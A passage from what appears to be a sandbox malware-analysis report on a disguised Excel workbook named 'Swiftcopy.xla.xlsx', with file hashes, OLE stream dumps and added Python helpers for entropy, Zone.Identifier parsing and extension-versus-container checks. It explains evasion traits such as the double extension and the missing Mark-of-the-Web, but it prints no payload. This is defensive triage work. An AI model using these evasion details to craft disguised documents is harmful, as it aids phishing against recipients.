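# Constructed sample in the style of the dropped script (identifiers taken from the
# preview above); it is not the sandbox's file, whose full content is not on the page.
SAMPLE_TEXT = "".join(
    '%s = "%s"\r\n' % pair
    for pair in [
        ("KLcvKWZLLBGBgiL", "KWtricliniarchaLjxmqAcAUar"),
        ("gbhxGPpKmUobWQp", "ccWbNWkOkiLUiHA"),
        ("SAKNtnekAPUWLzz", "bWKiBKhHGeddCKb"),
        ("mWaJamoPpvZhNik", "zoSAKndOeWqGOLc"),
        ("KCILabRxPJWtGug", "SHfgJRLecZPciri"),
        ("KcbLxLpacthuWbZ", "IphWpmhgGBdKJqB"),
    ]
)
UTF8_BYTES = SAMPLE_TEXT.encode("utf-8")
UTF16_BYTES = b"\xff\xfe" + SAMPLE_TEXT.encode("utf-16-le")  # BOM + UTF-16LE, like the dropped file


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the figure sandbox reports label 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_utf16le(data: bytes) -> bool:
    """A BOM, or a NUL at almost every odd offset, which ASCII-range UTF-16LE text has."""
    if data.startswith(b"\xff\xfe"):
        return True
    odd = data[1::2]
    return len(odd) >= 8 and odd.count(0) / len(odd) > 0.9


def normalize_text(data: bytes) -> bytes:
    """Re-encode UTF-16LE text as UTF-8 so entropy is compared on an equal footing."""
    if not looks_utf16le(data):
        return data
    text = data[: len(data) // 2 * 2].decode("utf-16-le", errors="replace")
    return text.lstrip("\ufeff").encode("utf-8")


def entropy_report(data: bytes) -> dict:
    """Raw byte entropy (what the report shows) next to the encoding-normalized value."""
    return {
        "utf16": looks_utf16le(data),
        "raw": shannon_entropy(data),
        "normalized": shannon_entropy(normalize_text(data)),
    }
```

Threshold rules of the form "entropy below 4 means plain text, above 7 means packed or encrypted" should be applied to the normalized value; on the raw value a UTF-16 script lands in the same band as an English README.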
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 28 06:28:21 2024, Security: 1
                                                                      Category:dropped
                                                                      Size (bytes):1148928
                                                                      Entropy (8bit):7.638539791384039
                                                                      Encrypted:false
                                                                      SSDEEP:24576:W0qGxoHlWIuWzEhMBv3bVp2CpQJ0bylZ7gLRh:pqNhN/53bV+6IZ7gl
                                                                      MD5:42D0BBF4A4F8BD59A2E907E35EA1F67A
                                                                      SHA1:C6EBC224C5B2FBD4757F6BD7EC223151B730B148
                                                                      SHA-256:40C6B65C0794B7139A0F6D08D91380337666634BEF0BDE1EBEA90D68A593BA20
                                                                      SHA-512:B4A489F9BCD5DF253BDA7E2F9DEB2EE14E1B9F46174B3FBA58EC5536EC4AD5E6B1EA0244ABB965F56FFB0C785929CA551189A88F343F0E08024FD87773D84372
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................Q.......................t.......v.......x........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:false
                                                                      Preview:[ZoneTransfer]....ZoneId=0
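The 26-byte ASCII file above is a Zone.Identifier alternate data stream. ZoneId=0 is the Local Machine zone, so a file carrying it has no Mark-of-the-Web and Office opens it without Protected View; a browser download would carry ZoneId=3 plus HostUrl and ReferrerUrl. The parser below is an added example, not from the report. The first sample is constructed to match the preview (four non-printable bytes between the two lines and none after; the exact bytes are an assumption), the second is a constructed download stream with made-up URLs. md5_matches_report compares a candidate reconstruction against the MD5 listed above, which is how to confirm or reject such an assumption.

```python
import hashlib

ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}
REPORT_MD5 = "187f488e27db4af347237fe461a079ad"  # MD5 the report lists for the stream above

# Constructed samples (see lead-in); the URLs are placeholders.
ZONE_LOCAL = b"[ZoneTransfer]\r\n\r\nZoneId=0"
ZONE_INTERNET = (
    b"[ZoneTransfer]\r\nZoneId=3\r\n"
    b"ReferrerUrl=https://example.invalid/\r\n"
    b"HostUrl=https://example.invalid/Swiftcopy.xla.xlsx\r\n"
)


def parse_zone_identifier(data: bytes) -> dict:
    """INI-style stream; tolerate blank lines, CR/LF variants and a missing final newline."""
    section, fields = None, {}
    for line in data.decode("utf-8", errors="replace").splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "ZoneTransfer" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    zone_id = int(fields["ZoneId"]) if fields.get("ZoneId", "").isdigit() else None
    return {
        "zone_id": zone_id,
        "zone": ZONE_NAMES.get(zone_id, "unknown"),
        # Office applies Protected View to files from the Internet and Restricted Sites zones.
        "motw": zone_id in (3, 4),
        "host_url": fields.get("HostUrl"),
        "referrer_url": fields.get("ReferrerUrl"),
    }


def md5_matches_report(candidate: bytes) -> bool:
    """Check a reconstructed stream against the hash the report lists for it."""
    return hashlib.md5(candidate).hexdigest() == REPORT_MD5
```

Run md5_matches_report(ZONE_LOCAL) to test the layout assumed for the first sample; if it returns False, try the other 26-byte layout with the CRLF after ZoneId=0 instead of between the lines.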
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 28 06:28:21 2024, Security: 1
                                                                      Category:dropped
                                                                      Size (bytes):1148928
                                                                      Entropy (8bit):7.638539791384039
                                                                      Encrypted:false
                                                                      SSDEEP:24576:W0qGxoHlWIuWzEhMBv3bVp2CpQJ0bylZ7gLRh:pqNhN/53bV+6IZ7gl
                                                                      MD5:42D0BBF4A4F8BD59A2E907E35EA1F67A
                                                                      SHA1:C6EBC224C5B2FBD4757F6BD7EC223151B730B148
                                                                      SHA-256:40C6B65C0794B7139A0F6D08D91380337666634BEF0BDE1EBEA90D68A593BA20
                                                                      SHA-512:B4A489F9BCD5DF253BDA7E2F9DEB2EE14E1B9F46174B3FBA58EC5536EC4AD5E6B1EA0244ABB965F56FFB0C785929CA551189A88F343F0E08024FD87773D84372
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................Q.......................t.......v.......x........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):165
                                                                      Entropy (8bit):1.4377382811115937
                                                                      Encrypted:false
                                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                      Malicious:true
                                                                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 27 07:11:39 2024, Security: 1
                                                                      Entropy (8bit):7.619369630824882
                                                                      TrID:
                                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                      File name:Swiftcopy.xla.xlsx
                                                                      File size:1'158'144 bytes
                                                                      MD5:286b0bc4d52a6d17815a7724e03e980a
                                                                      SHA1:e0a09d030b4f7d5839cb1b1a9c981d5c36e1ad47
                                                                      SHA256:4b125219e5ef649021f0599e73be512a80d987ff8224036445c15fbd684c07c4
                                                                      SHA512:a6c37f7ebbe8d6f482daeb90277e9831e0fcb6446bad4abdfcfd45a619f8a205c8fe450f85c4edf8eb04803c9cf7a3840e4a1c0b7ef12eed17314d232f959ea1
                                                                      SSDEEP:24576:h0qGxoHlWIuWzPxiBl3bVkIflRP+cepnSqbsFQHTmn:SqNhNsD3bVdP1eoQq
                                                                      TLSH:FF35F1A1A6438A4ED595033540F38A9E261DDC825B5EF63B3118B34D7FB0E970B8F636
                                                                      File Content Preview:........................>...............................................................................Q.......................u.......w.......y..............................................................................................................
                                                                      Icon Hash:2562ab89a7b7bfbf
                                                                      Document Type:OLE
                                                                      Number of OLE Files:1
                                                                      Has Summary Info:
                                                                      Application Name:Microsoft Excel
                                                                      Encrypted Document:True
                                                                      Contains Word Document Stream:False
                                                                      Contains Workbook/Book Stream:True
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:False
                                                                      Flash Objects Count:0
                                                                      Contains VBA Macros:True
                                                                      Code Page:1252
                                                                      Author:
                                                                      Last Saved By:
                                                                      Create Time:2006-09-16 00:00:00
                                                                      Last Saved Time:2024-11-27 07:11:39
                                                                      Creating Application:Microsoft Excel
                                                                      Security:1
                                                                      Document Code Page:1252
                                                                      Thumbnail Scaling Desired:False
                                                                      Contains Dirty Links:False
                                                                      Shared Document:False
                                                                      Changed Hyperlinks:False
                                                                      Application Version:786432
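The sample is named Swiftcopy.xla.xlsx, but TrID, the Document Type field and the file content preview all identify an OLE2 compound file (BIFF8 workbook with a VBA project), not the ZIP container that .xlsx promises; the inner .xla extension is an Excel add-in suffix. Excel opens the file by content, so the outer extension only affects what the recipient sees. The Python below is an added example, not part of the report: it sniffs the container from the first bytes, reads the CFB header fields a triage check needs, and reports the extension mismatch and the double extension. The header is constructed (CLSID zeroed, version 3, 512-byte sectors) and is not the sample's own bytes.

```python
import struct

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ZIP_MAGIC = b"PK\x03\x04"

# The container each Office extension promises: legacy binary formats are OLE2/CFB,
# Office Open XML formats are ZIP archives.
CONTAINER_FOR_EXT = {
    ".xls": "cfb", ".xla": "cfb", ".xlt": "cfb", ".doc": "cfb", ".dot": "cfb", ".ppt": "cfb",
    ".xlsx": "zip", ".xlsm": "zip", ".xlam": "zip", ".docx": "zip", ".docm": "zip", ".pptx": "zip",
}


def cfb_header(major: int = 3, sector_shift: int = 9, mini_shift: int = 6) -> bytes:
    """Constructed 512-byte CFB header (CLSID zeroed) in the layout a real file starts with."""
    # offsets 0x18..0x21: minor version, major version, byte order, sector shift, mini sector shift
    fixed = struct.pack("<HHHHH", 0x003E, major, 0xFFFE, sector_shift, mini_shift)
    return (CFB_MAGIC + b"\x00" * 16 + fixed).ljust(512, b"\x00")


def sniff_container(header: bytes) -> dict:
    """Identify the container from the first bytes; for CFB also read the header fields."""
    if header.startswith(CFB_MAGIC) and len(header) >= 0x22:
        minor, major, byte_order, sector_shift, mini_shift = struct.unpack_from("<HHHHH", header, 0x18)
        return {
            "container": "cfb",
            "major_version": major,
            "sector_size": 1 << sector_shift,
            "mini_sector_size": 1 << mini_shift,
            # v3 files use 512-byte sectors, v4 files 4096-byte sectors; anything else is malformed
            "header_consistent": byte_order == 0xFFFE and (major, sector_shift) in ((3, 9), (4, 12)),
        }
    if header.startswith(ZIP_MAGIC):
        return {"container": "zip"}
    return {"container": "unknown"}


def check_extension(filename: str, header: bytes) -> dict:
    """Compare what the file name claims with what the bytes are."""
    parts = filename.lower().split(".")
    exts = ["." + p for p in parts[1:]]  # every trailing extension, e.g. ['.xla', '.xlsx']
    declared = CONTAINER_FOR_EXT.get(exts[-1]) if exts else None
    sniffed = sniff_container(header)
    return {
        "extensions": exts,
        "double_extension": len(exts) > 1,
        "declared": declared,
        "actual": sniffed["container"],
        "mismatch": declared is not None and declared != sniffed["container"],
        "details": sniffed,
    }
```

A mismatch is not proof of malice on its own (users rename files), but combined with an embedded VBA project and the Encrypted Document flag above it is the triage signal that justifies detonation.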
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                      VBA File Name:Sheet1.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E { . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f5 45 7b 9d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Attribute VB_Name = "Sheet1"
                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True
                                                                      

                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                      VBA File Name:Sheet2.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E } . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f5 45 7d 9d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Attribute VB_Name = "Sheet2"
                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True
                                                                      

                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                      VBA File Name:Sheet3.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f5 45 e3 a5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Attribute VB_Name = "Sheet3"
                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True
                                                                      

                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                      VBA File Name:ThisWorkbook.cls
                                                                      Stream Size:985
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f5 45 ac 2e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Attribute VB_Name = "ThisWorkbook"
                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True
                                                                      

                                                                      General
                                                                      Stream Path:\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.25248375192737
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:244
                                                                      Entropy:2.889430592781307
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                      General
                                                                      Stream Path:\x5SummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:200
                                                                      Entropy:3.285842543212684
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . F @ . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                      General
                                                                      Stream Path:MBD003994AB/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.25248375192737
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:MBD003994AB/\x5DocumentSummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:248
                                                                      Entropy:2.8688274782657706
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W a l s h i p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 68 00 00 00 0b 00 00 00 70 00 00 00 10 00 00 00 78 00 00 00 13 00 00 00 80 00 00 00 16 00 00 00 88 00 00 00 0d 00 00 00 90 00 00 00 0c 00 00 00 a3 00 00 00
                                                                      General
                                                                      Stream Path:MBD003994AB/\x5SummaryInformation
                                                                      CLSID:
                                                                      File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\355\355\355PPP\374\374\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377" (libmagic misidentification: the fe ff 00 00 / 06 02 02 00 header in Data Raw is an OLE property set, and its property list includes PID 0x11, the thumbnail, which accounts for the 117868-byte size and the pixel-like "1st item")
                                                                      Stream Size:117868
                                                                      Entropy:3.7414491791536952
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . < . . . . . . . . . . P . . . . . . . X . . . . . . . l . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P c W a l s h i p . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . 7 . @ . . . . . @ . . . . < z 3 . . . . . . . . . G . . . t . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 3c cc 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 6c 00 00 00 12 00 00 00 7c 00 00 00 0b 00 00 00 94 00 00 00 0c 00 00 00 a0 00 00 00 0d 00 00 00 ac 00 00 00 13 00 00 00 b8 00 00 00 11 00 00 00 c0 00 00 00
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD0145F583/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.219515110876372
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:MBD003994AB/MBD0145F583/Package
                                                                      CLSID:
                                                                      File Type:Microsoft Excel 2007+
                                                                      Stream Size:22251
                                                                      Entropy:7.612475685241722
                                                                      Base64 Encoded:True
